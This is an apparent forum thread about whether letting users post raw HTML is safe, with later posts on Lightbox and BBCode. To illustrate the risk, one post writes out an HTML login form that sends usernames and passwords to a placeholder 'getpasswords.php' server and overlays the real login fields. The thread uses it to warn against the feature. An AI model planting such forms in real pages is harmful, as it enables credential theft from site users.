HTML mod - safe ?

Don't think it's very safe, I could probably write some Javascript that sends all the cookies of the viewing user to my server or so

Surely posting the youtube/google video link inside [youtube] tags is much simpler than posting html code?

No, any HTML tag can be manipulated to have javascript in it as an attribute.

OK. OK. I see. Here is a warning from the CERT dating 2000 ! http://www.cert.org/advisories/CA-2000-02.html

Oh dear. By bye customization.

So it means that on myspace, people can do whatever they want since they can include any code they want. I really wonder how this has not lead to a major security catastrophy.

I thought I had the key to customizing my users profiles and posts. Need to think about something else I guess. One user has already done a copy/paste of a <object> from a music website and is complaining that it's not playing.

Don't forget <object><applet> and others

Also, wouldn't be nice to have

<form action="http://privateserver.com/getpasswords.php">
<input type="text" name="username" style="position:absolute; left: 50px; top:70px;">
<input type="password" name="password" style="position:absolute; left: 50px; top:80px;">

Someone could put their own form in there, and place the input items overtop your own login input items.

Frankly, if you allow user submitted html anywhere on your site, people could come up with a new way to cause grief every other second

Just out of curiosity, without enabling html in posts, how would one go about implementing the use of the quicktime/real mod and lightbox, (not the gallery one), which use the <a href links?

I've just put up the info for the lightbox settings. The basics are the same across them all, (plus punres is down).

Lightbox: http://www.huddletogether.com/projects/lightbox2/

The settings are halfway down the page.

Here's the readme file for the lightbox incorporation into punbb:

http://outgoing.bauchan.org/software/li … readme.txt

It may just be I that's missed the obvious, but I can't see any bbcode tag there. How would one go about incorporating it into the bbcode if so?

Cheers,

Matt

if you are going to use or make an HTML mod for your forum have it only for Admins of course, but better yet, only allowed by Admins in certain forums. In my forum, the admin can post HTML but only on the specific forums that allow this (these being the ones for news/announcements that appear on the homepage etc). Allowing unrestricted use of HTML by a certain group will also make the forum messier and make the divide between admins and regular users bigger.

It means exactly what I said
The output that PunBB creates when using the img BBCode tags is modified to take advantage of the Lightbox script. It doesn't require the user to write any HTML.

Did you enable img BBCode in your forum?